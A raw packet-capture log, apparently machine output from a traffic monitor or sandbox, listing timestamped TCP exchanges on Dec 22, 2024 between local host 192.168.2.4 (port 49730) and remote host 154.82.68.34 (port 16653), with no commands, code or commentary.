                                      Dec 22, 2024 08:37:11.090662003 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.090671062 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.090708017 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.091773987 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.091815948 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.091831923 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.091869116 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.092957020 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.092999935 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.093056917 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.093099117 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.094105005 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.094151974 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.094207048 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.094243050 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.095355034 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.095400095 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.095401049 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.095438957 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.096590996 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.096642971 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.096718073 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.096761942 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.097640991 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.097681999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.097738981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.097779989 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.098829985 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.098874092 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.098921061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.098963022 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.100037098 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.100079060 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.100131989 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.100172043 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.101202011 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.101247072 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.101305962 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.101349115 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.102399111 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.102441072 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.102449894 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.102497101 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.103578091 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.103617907 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.103694916 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.103734970 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.104840040 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.104880095 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.104933977 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.104974031 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.106108904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.106153011 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.106157064 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.106199026 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.107093096 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.107131958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.107213020 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.107253075 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.108285904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.108328104 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.108473063 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.108511925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.109575033 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.109613895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.109708071 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.109750032 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.110682964 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.110723972 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.110784054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.110824108 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.111831903 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.111867905 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.111938953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.111982107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.113028049 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.113070011 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.113174915 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.113215923 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.114176989 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.114214897 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.114298105 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.114337921 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.115398884 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.115443945 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.115494013 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.115549088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.116683960 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.116730928 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.116816044 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.116859913 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.117749929 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.117796898 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.117870092 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.117921114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.118907928 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.118958950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.119131088 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.119177103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.120096922 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.120145082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.120244980 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.120290995 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.121279001 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.121323109 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.121391058 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.121431112 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.122456074 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.122512102 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.122596025 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.122637033 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.123626947 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.123667955 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.123730898 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.123769999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.124826908 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.124869108 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.124933004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.124969006 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.126069069 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.126111031 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.126168013 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.126208067 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.127176046 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.127219915 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.127269983 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.127310991 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.128366947 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.128412008 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.128443003 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.128482103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.129549026 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.129589081 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.129820108 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.129861116 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.130779982 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.130819082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.130882025 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.130923986 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.131907940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.131948948 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.132009029 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.132049084 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.133059978 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.133099079 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.133174896 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.133219957 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.134268045 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.134309053 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.134368896 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.134411097 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.135477066 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.135519028 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.135571003 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.135617018 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.136615038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.136665106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.136941910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.136986971 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.137818098 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.137856960 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.137887955 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.137923956 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.138978958 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.139029026 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.139055967 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.139100075 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.140181065 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.140219927 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.140307903 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.140350103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.141360998 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.141411066 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.141489029 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.141532898 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.142510891 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.142551899 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.142617941 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.142659903 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.143767118 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.143824100 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.143857002 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.143898964 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.144895077 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.144936085 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.145008087 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.145049095 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.146089077 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.146133900 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.146167040 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.146208048 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.277492046 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.277581930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.277636051 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.277683020 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.278044939 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.278090000 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.278126001 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.278167963 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.278889894 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.278942108 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.278959990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.279002905 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.280255079 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.280307055 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.280363083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.280405998 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.281218052 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.281265974 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.281347990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.281393051 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.282412052 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.282459974 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.282495975 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.282536983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.283545971 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.283593893 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.283663988 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.283705950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.284794092 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.284841061 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.284912109 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.284950972 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.285929918 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.285981894 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.286055088 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.286093950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.287106991 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.287123919 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.287153006 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.287170887 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.288319111 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.288363934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.288469076 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.288511038 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.289501905 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.289544106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.289583921 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.289619923 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.290663004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.290704012 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.290735006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.290777922 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.291831017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.291874886 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.291938066 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.291979074 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.293009996 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.293060064 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.293107033 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.293148994 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.294203043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.294243097 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.294415951 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.294460058 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.295375109 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.295416117 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.295718908 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.295759916 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.296581984 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.296624899 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.296717882 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.296760082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.297754049 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.297801018 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.297847033 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.297885895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.298964024 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.299012899 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.299043894 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.299082994 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.300108910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.300157070 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.300241947 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.300281048 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.301284075 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.301323891 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.301400900 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.301440954 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.302468061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.302510023 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.302642107 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.302697897 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.303662062 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.303706884 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.303793907 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.303837061 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.304831028 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.304873943 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.304955959 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.304994106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.306036949 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.306083918 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.306309938 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.306354046 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.307199001 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.307241917 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.307360888 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.307403088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.308404922 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.308461905 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.308473110 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.308515072 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.309588909 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.309628963 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.309701920 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.309740067 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.310776949 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.310885906 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.310923100 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.310962915 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.311978102 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.312021017 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.312218904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.312263012 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.313083887 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.313128948 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.313194990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.313234091 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.314264059 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.314308882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.314448118 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.314532995 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.315454006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.315498114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.315537930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.315579891 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.316725016 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.316766024 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.316884041 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.316939116 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.317868948 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.317907095 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.317939997 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.317977905 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.319015980 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.319058895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.319185019 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:11.319226027 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:11.320230961 CET1665349730154.82.68.34192.168.2.4
